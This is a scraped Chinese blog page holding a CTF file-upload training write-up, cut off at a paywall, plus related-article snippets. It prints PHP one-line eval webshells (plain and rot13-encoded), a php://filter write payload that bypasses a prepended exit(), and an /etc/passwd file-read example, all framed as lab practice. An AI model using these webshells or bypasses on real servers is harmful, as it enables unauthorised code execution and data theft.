8月1日CTF文件上传训练

最新推荐文章于 2023-09-26 21:15:52 发布
最新推荐文章于 2023-09-26 21:15:52 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 笔记 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slc3315/article/details/107734299
版权
本文详细介绍了CTF比赛中常见的文件上传漏洞利用技巧,包括伪协议上传、.user.ini文件包含上传和.htaccess文件包含上传。通过实例演示了上传测试、添加ini和htaccess文件的步骤,并强调了一句话木马的正确编写和上传顺序的重要性。
摘要由CSDN通过智能技术生成

题记:
满足于只做出一道题的今天

一、伪协议上传

题目:
在这里插入图片描述
思路:
代码表示需要使用伪协议上传,且不能用base64
dir=php://filter/write=string.rot13/resource=file.php
制作rot13cmd.php
内容:

<?cuc @riny($_CBFG['pzq']);?>
//<?php @eval($_POST['cmd']);?>的rot13编码

在dir处写payload:

php://filter/write=string.rot13/resource=upload/rot13cmd.php
//主要两点,一是上传文件名可以选择与上传文件同名,二是upload文件路径是注释提醒和自己测试出来的

步骤一:上传测试

if (strstr($dir, 'base')) {
        die("not use base");
    }
    @file_put_contents($dir, '<?php exit();?>'.file_get_contents($_FILES['file']['tmp_name']));
   /
最低0.47元/天 解锁文章
陆小朝
关注
专栏目录
c++ eclipse clion mingw-32写jni的dll
chenhuaijin123的博客
06-07 516
本次需求: 利用eclipse,clion,mingw-32在windows 10上为java1.8 32位写一个jni,实现简单的加法及打印字符串 重点:对c++,c的编译即将cpp文件编译成.o文件,修改生成的cpp文件,最后再编译成dll 参考文档:https://juejin.im/entry/5865d619ac502e006d5ee1e1 参考以上文档生成header文件等,我...
文件上传——无验证(ctfhub 文件上传-无限制)
weixin_45864041的博客
01-26 729
文件上传漏洞最简单的就是上传小马,即一句话木马。 例如: <?php @eval($_POST['hacker']);?> 在这简单的一句话中,将会引发巨大的影响,eval函数将会把括号里面的内容当成代码进行执行。 本题中无验证,那我们可以直接上传小马。 上传成功后他告诉了我们上传文件存储的相关路径,如果题目里面没有给出有关的路径,那我们就必须要去猜测文件路径,然后才可以用蚁剑进行连接。 这里连接的密码就是我们前面所写的一句话木马$_POST这个括号里面的内容。 连接成功我们就可以对这
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
BugkuCTF-WEB题file_get_contents
am_03的博客
08-29 6652
知识点 empty() 函数用于检查一个变量是否为空。empty() 判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于 FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。 extract()函数从数组里将变量导入到当前的符号表。extract函数:可以进行变量覆盖。 语法:extract(array,extract_rules,prefix) 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组里的各元素,将在当前符号表里创建对应的一个变量。第二
fileclude-CTF 解题思路
m0_73734159的博客
04-26 2291
【代码】fileclude-CTF 解题思路。
731CTF文件漏洞训练
slc3315的博客
07-31 1335
题记 今天主要是文件上传及下载,高难度第三题 一、文件包含 题目: 思路: 文件包含,右键源代码,利用data、filte等伪协议传参 步骤一:发现注入点 右键源代码发现php链接 新页面点击后快速结束,需要抓包 步骤二:伪协议 分析上述代码发现传参file,同时屏蔽了tp、input、data等协议。同时增加了一个flag.php(直接打开可不行) 本页面上编辑伪协议 file=php://filter/read=convert.base64-encode/resource=flag.php bas
87CTF反序列化训练
slc3315的博客
08-08 1635
题目一 题目: 思路: 根据题目提示,存在备份文件,使用御剑或者disteach进行查找,找到www.zip,下载源码进行源码分析,然后构造对应反序列化参数即可 步骤一 源码分析: class Name{ public $username; public $password; function __wakeup(){ $this->username = 'guest'; } function __destruct(){ if
CTF训练
qq_43679873的博客
01-11 1261
CTF训练
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4495
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
CTF-file_get_contents()
mr__sheng的博客
09-11 370
calc.php?%20num=1;
CTF web小总结
A_dmin的博客
07-15 3701
PHP绕过技巧、SQL技巧、命令执行绕过小技巧、反序列化、文件上传绕过
20210218CTF伪协议绕过file_get_contents(bugkuctf的web21御结冰城感想)
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
BMZCTF SSRFME 详解
u013797594的博客
07-04 826
BMZCTF ssrfme详解 题目: 打开题目直接是PHP代码,阅读代码:首先要求传入get参数file和path,file会直接赋值给$url,path会拼接upload,如果$path里面有…那么就会终止执行。$url如果以http://127.0.0.1/开头,则通过file_get_contents($url)读取内容,然后通过file_put_contents()写入到$path中,并且通过echo输出"console.log($path update successed!)" ,$path
[MRCTF2020]套娃 GET POST 读取字符串特性 伪造ip 伪协议伪造 file_get_contents()
最新发布
m0_64180167的博客
09-26 686
然后我们需要绕过 第一个判断个数 又要过第二个正则 正则使用 %0A 即可。选择就是如何绕过 change 输出flag 就要开始逆向了。我们通过 GET POST 传递参数是将字符串作为数组传递。这里面就显示了 我们 在每个位置可以 选择绕过的 字符。其次就是通过 fie_get_content读取。我们要如何实现绕过呢, 下面这些方法都可以实现。运用这里我们就可以绕过许多的waf 或者拦截。第一个我们如何绕过呢 使用上面的表来桡过。这里能发现 就是进行了两个操作。那么传递了参数 做了什么操作。
【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议
等风来
05-22 9992
是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。函数,该函数返回当前工作目录的绝对路径。函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。
CG CTF-Web-file_get_contents
feng的博客
09-08 905
WP 进入环境后先发现什么都没有,我们f12查看源码,会发现代码,因此进行代码审计: <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 我们可以发现这题有一个file_get_contents函数。因为我们要get一个file,而且他的内容还要是meizijiu,我一开始想到了文件包含相关的内容,想到了php的一些伪协议。这时候我上网查file_get_con
ctf刷题记录
enhengzZ的博客
04-23 1445
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
SSRF漏洞原理和实验
gl620321的博客
06-02 4162
一.SSRF概述 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方...
CTF挑战:Web安全漏洞——任意文件上传与下载实战
CTF(Capture The Flag)竞赛中,特别是在Web安全领域,"任意文件上传+任意文件下载"是一个常见的挑战,涉及到黑客技术的运用和Web应用程序的安全漏洞利用。这类题目通常要求参赛者通过精心构造的HTTP请求,上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值